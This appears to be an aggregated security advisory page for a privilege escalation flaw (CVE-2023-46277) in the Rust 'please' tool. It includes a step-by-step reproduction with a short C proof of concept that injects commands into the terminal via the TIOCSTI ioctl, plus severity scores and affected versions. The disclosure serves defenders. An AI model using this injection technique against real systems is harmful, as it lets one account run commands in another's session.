Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1jZ2Y4LWgzZnAtaDk1Ns4AA2lB
Pleaser privilege escalation vulnerability
please (aka pleaser) through 0.5.4 allows privilege escalation through the TIOCSTI and/or TIOCLINUX ioctl. (If both TIOCSTI and TIOCLINUX are disabled, this cannot be exploited.)
Here is how to see it in action:
$ cd "$(mktemp -d)"
$ git clone --depth 1 https://gitlab.com/edneville/please.git
$ cd please/
$ git rev-parse HEAD # f3598f8fae5455a8ecf22afca19eaba7be5053c9
$ cargo test && cargo build --release
$ echo "[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false' | sudo tee /etc/please.ini
$ sudo chown root:root ./target/release/please
$ sudo chmod u+s ./target/release/please
$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
#include <sys/ioctl.h>
int main(void) {
const char *text = "id\n";
while (*text)
ioctl(0, TIOCSTI, text++);
return 0;
}
TIOCSTI_C_EOF
$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
$ ./target/release/please -u nobody /tmp/TIOCSTI # runs id(1) as ${USER} rather than nobody
Please note that:
This affects both the case where root wants to drop privileges as well when non-root wants to gain other privileges.
Permalink: https://github.com/advisories/GHSA-cgf8-h3fp-h956JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jZ2Y4LWgzZnAtaDk1Ns4AA2lB
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 7 months ago
Updated: 6 months ago
CVSS Score: 7.8
CVSS vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-cgf8-h3fp-h956, CVE-2023-46277
References:
- https://nvd.nist.gov/vuln/detail/CVE-2023-46277
- https://github.com/rustsec/advisory-db/pull/1798
- https://gitlab.com/edneville/please/-/issues/13
- https://gitlab.com/edneville/please/-/merge_requests/69#note_1594254575
- https://rustsec.org/advisories/RUSTSEC-2023-0066.html
- https://github.com/advisories/GHSA-cgf8-h3fp-h956
Blast Radius: 1.0
Affected Packages
cargo:pleaser
Dependent packages: 0Dependent repositories: 0
Downloads: 11,003 total
Affected Version Ranges: <= 0.5.4
No known fixed version
All affected versions: 0.1.0, 0.2.0, 0.3.0, 0.3.1, 0.3.3, 0.3.4, 0.3.5, 0.3.7, 0.3.8, 0.3.9, 0.3.10, 0.3.11, 0.3.12, 0.3.15, 0.3.16, 0.3.17, 0.3.18, 0.3.19, 0.3.20, 0.3.21, 0.3.22, 0.3.24, 0.3.25, 0.4.0, 0.4.1, 0.4.2, 0.5.0, 0.5.1, 0.5.2, 0.5.3, 0.5.4